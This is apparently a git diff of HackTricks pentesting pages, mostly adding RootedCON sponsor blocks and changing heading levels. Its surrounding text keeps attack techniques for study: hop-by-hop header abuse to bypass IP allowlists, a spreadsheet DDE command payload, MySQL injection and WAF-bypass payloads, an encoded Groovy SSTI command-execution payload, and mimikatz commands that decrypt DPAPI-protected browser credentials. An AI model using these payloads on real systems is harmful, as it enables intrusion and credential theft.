-# What is a hop-by-hop header? +​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + +## What is a hop-by-hop header? A hop-by-hop header is a header which is designed to be processed and consumed by the proxy currently handling the request, as opposed to an end-to-end header. @@ -29,13 +30,13 @@ Further to these defaults, a request [may also define a custom set of headers to Connection: close, X-Foo, X-Bar ``` -# The theory on abusing hop-by-hop headers +## The theory on abusing hop-by-hop headers In theory, proxies should remove hop-by-hop headers received before sending them to the next address. But you can find in the wild that this is done by some proxies and others just send all the headers adding its own `Connection`header. ![](<../.gitbook/assets/image (138).png>) -# Testing hop-by-hop deletions +## Testing hop-by-hop deletions If you find a header that makes the response of the server changes if it is set of if it is not, then you can search for hop-by-hop deletions. For example, the cookie header will make the response of the server to be dramatically different if it is set (with a valid content) and if it is not. @@ -49,42 +50,44 @@ for HEADER in $(cat headers.txt); do python poison-test.py -u "https://target" - This will cycle through the entire header list and print out if its presence in the hop-by-hop list created a different status code or response body size. -# Abusing X-Forwarded-For +## Abusing X-Forwarded-For In general, proxies will add the IPs of the clients inside the `X-Forwarded-For` header so the next hop will know where does the petition comes from. However, if an attacker sends a Connection value like `Connection: close, X-Forwarded-For` and the first proxy sends the hop-by-hop headers with their values (it sends the special Connection value), then the second value may delete the X-Forward-For header.\ At the end, the final App won't know who sent the request and may think that it was the last proxy, and is this scenario an attacker may be able to access resources protected by IP whitelisting (maybe some `/admin` ?). Depending on the system being targeted, you may also have `Forwarded`, `X-Real-IP`, and a bunch of others that are less common. -# Detecting Proxies and fingerprinting services +## Detecting Proxies and fingerprinting services This technique may be useful to detect proxies (using the cookie technique) or even to detect services. For example, if you abuse this technique to delete the header `X-BLUECOAT-VIA` and an error is thrown, then you have find that Bluecoat was being used. -# Other Attacks +## Other Attacks * For a possible DoS Cache poisoning abusing this technique read the original link * This could be useful in attacks that may allow you to insert new headers (low probability) * Also,it could be useful to bypass defensive functionalities. For example, if the lack of a header means that a request shouldn't be processed by a WAF, you could bypass a WAF with this technique. -# References +## References {% embed url="https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers" %} +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\ + + +{% embed url="https://www.rootedcon.com/" %}
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting-web/formula-doc-latex-injection.md b/pentesting-web/formula-doc-latex-injection.md index 457e68c34..5d35a1d82 100644 --- a/pentesting-web/formula-doc-latex-injection.md +++ b/pentesting-web/formula-doc-latex-injection.md @@ -66,7 +66,7 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).png>) +![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) ### More diff --git a/pentesting-web/login-bypass/README.md b/pentesting-web/login-bypass/README.md index 5a43da0b6..245a049c8 100644 --- a/pentesting-web/login-bypass/README.md +++ b/pentesting-web/login-bypass/README.md @@ -4,18 +4,20 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## **Bypass regular login** If you find a login page, here you can find some techniques to try to bypass it: @@ -104,18 +106,22 @@ Pages usually redirects users after login, check if you can alter that redirect * Check if you can **enumerate usernames** abusing the login functionality. * Check if **auto-complete** is active in the password/**sensitive** information **forms** **input:** `
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md index 9a6429bbd..4edfc1e76 100644 --- a/pentesting-web/saml-attacks/README.md +++ b/pentesting-web/saml-attacks/README.md @@ -22,7 +22,7 @@ ## Attacks Graphic -![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1).png>) ## Tool diff --git a/pentesting-web/sql-injection/README.md b/pentesting-web/sql-injection/README.md index 4647015c6..8e51369cf 100644 --- a/pentesting-web/sql-injection/README.md +++ b/pentesting-web/sql-injection/README.md @@ -12,6 +12,14 @@ +​ + +
+ +​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## What is SQL injection? SQL injection is a web security vulnerability that allows an attacker to **interfere** with the **queries** that an application makes to its **database**. It generally allows an attacker to **view data** that they are not normally able to retrieve. This might include data belonging to **other users**, or any other data that the **application** itself is able to **access**. In many cases, an attacker can **modify** or **delete** this data, causing persistent changes to the application's content or behaviour.\ @@ -294,6 +302,14 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability. Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) + + +
+ +​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Authentication bypass List to try to bypass the login functionality: @@ -443,6 +459,14 @@ Using **hex** and **replace** (and **substr**): '+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+' ``` +​ + +
+ +​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Routed SQL injection Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. ([Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt)) @@ -555,6 +579,16 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %} + + +​ + +
+ +​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/pentesting-web/sql-injection/mysql-injection/README.md b/pentesting-web/sql-injection/mysql-injection/README.md index 068e3a420..a6864de98 100644 --- a/pentesting-web/sql-injection/mysql-injection/README.md +++ b/pentesting-web/sql-injection/mysql-injection/README.md @@ -1,25 +1,24 @@ - +# MySQL injection
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
-**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md) +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. -# Comments +{% embed url="https://www.rootedcon.com/" %} + +## Comments ```sql -- MYSQL Comment @@ -29,9 +28,9 @@ /*!32302 10*/ Comment for MySQL version 3.23.02 ``` -# Interesting Functions +## Interesting Functions -## Confirm Mysql: +### Confirm Mysql: ``` concat('a','b') @@ -47,7 +46,7 @@ length(1) count(1) ``` -## Useful functions +### Useful functions ```sql SELECT hex(database()) @@ -65,7 +64,7 @@ SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END) strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep() ``` -# All injection +## All injection ```sql SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/" @@ -73,7 +72,7 @@ SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCH from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/) -# Flow +## Flow Remember that in "modern" versions of **MySQL** you can substitute "_**information\_schema.tables**_" for "_**mysql.innodb\_table\_stats**_**"** (This could be useful to bypass WAFs). @@ -84,17 +83,17 @@ SELECT , FROM ; #Get values SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges ``` -## **Only 1 value** +### **Only 1 value** * `group_concat()` * `Limit X,1` -## **Blind one by one** +### **Blind one by one** * `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112` * `mid(version(),X,1)='5'` -## **Blind adding** +### **Blind adding** * `LPAD(version(),1...lenght(version()),'1')='asd'...` * `RPAD(version(),1...lenght(version()),'1')='asd'...` @@ -102,7 +101,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges * `SELECT LEFT(version(),1...lenght(version()))='asd'...` * `SELECT INSTR('foobarbar', 'fo...')=1` -# Detect number of columns +## Detect number of columns Using a simple ORDER @@ -119,7 +118,15 @@ UniOn SeLect 1,2,3 ... ``` -# MySQL Union Based +​ + +
+ +​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + +## MySQL Union Based ```sql UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata @@ -128,21 +135,21 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` -# SSRF +## SSRF **Learn here different options to** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.** -# WAF bypass tricks +## WAF bypass tricks -## Information\_schema alternatives +### Information\_schema alternatives -Remember that in "modern" versions of **MySQL** you can substitute _**information\_schema.tables**_ for _**mysql.innodb\_table\_stats**_** ** or for _**sys.x$schema\_flattened\_keys**_ or for **sys.schema\_table\_statistics** +Remember that in "modern" versions of **MySQL** you can substitute _**information\_schema.tables**_ for _**mysql.innodb\_table\_stats**_\*\* \*\* or for _**sys.x$schema\_flattened\_keys**_ or for **sys.schema\_table\_statistics** ![](<../../../.gitbook/assets/image (154).png>) ![](<../../../.gitbook/assets/image (155).png>) -## MySQLinjection without COMMAS +### MySQLinjection without COMMAS Select 2 columns without using any comma ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)): @@ -150,7 +157,7 @@ Select 2 columns without using any comma ([https://security.stackexchange.com/qu -1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1# ``` -## Retrieving values without the column name +### Retrieving values without the column name If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like: @@ -169,11 +176,11 @@ select (select 1, 'flaf') = (SELECT * from demo limit 1); More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952) -## MySQL history +### MySQL history You ca see other executions inside the MySQL reading the table: **sys.x$statement\_analysis** -## Version alternative**s** +### Version alternative**s** ``` mysql> select @@innodb_version; @@ -198,21 +205,22 @@ mysql> mysql> select version(); +-------------------------+ ``` +​ + +
+ +​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %}
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md index fe8ab2b9d..a3f4160c7 100644 --- a/pentesting-web/ssti-server-side-template-injection/README.md +++ b/pentesting-web/ssti-server-side-template-injection/README.md @@ -1,7 +1,5 @@ # SSTI (Server Side Template Injection) -## SSTI (Server Side Template Injection) -
Support HackTricks and get benefits! @@ -14,6 +12,12 @@
+
+ +[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## What is server-side template injection? A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. @@ -427,6 +431,16 @@ this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120})) ``` + + +
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + +## + ### Smarty (PHP) ```php @@ -819,7 +833,7 @@ Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/mast ## BlackHat PDF -{% file src="../../.gitbook/assets/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf" %} +{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %} ## Related Help @@ -842,6 +856,12 @@ If you think it could be useful, read: * [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI) * [**https://portswigger.net/web-security/server-side-template-injection**](https://portswigger.net/web-security/server-side-template-injection) +
+ +​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md index 81fe292ac..9ad7fafa4 100644 --- a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md +++ b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md @@ -12,6 +12,16 @@
+
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + + + + + While creating this post mimikatz was having problems with every action that interacted with DPAPI therefore **most of the examples and images were taken from**: [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#extracting-dpapi-backup-keys-with-domain-admin) ## What is DPAPI @@ -120,8 +130,6 @@ dpapi::masterkey /in:"C:\Users\\AppData\Roaming\Microsoft\Protect\S-1- The master key of the file will appear in the output. -![](<../../.gitbook/assets/image (325).png>) - Finally, you can use that **masterkey** to **decrypt** the **credential file**: ``` @@ -154,8 +162,6 @@ Using the retrieved backup key, let's decrypt user's `spotless` master key: dpapi::masterkey /in:"C:\Users\spotless.OFFENSE\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk ``` -![](<../../.gitbook/assets/image (328).png>) - We can now decrypt user's `spotless` chrome secrets using their decrypted master key: ``` @@ -183,8 +189,6 @@ With extracted from LDAP computers list you can find every sub network even if y "Because Domain Admin rights are not enough. Hack them all." -![](../../.gitbook/assets/HEKATOMB.png) - ## DonPAPI [**DonPAPI**](https://github.com/login-securite/DonPAPI) can dump secrets protected by DPAPI automatically. @@ -194,6 +198,14 @@ With extracted from LDAP computers list you can find every sub network even if y * [https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13](https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13) * [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c) + + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits!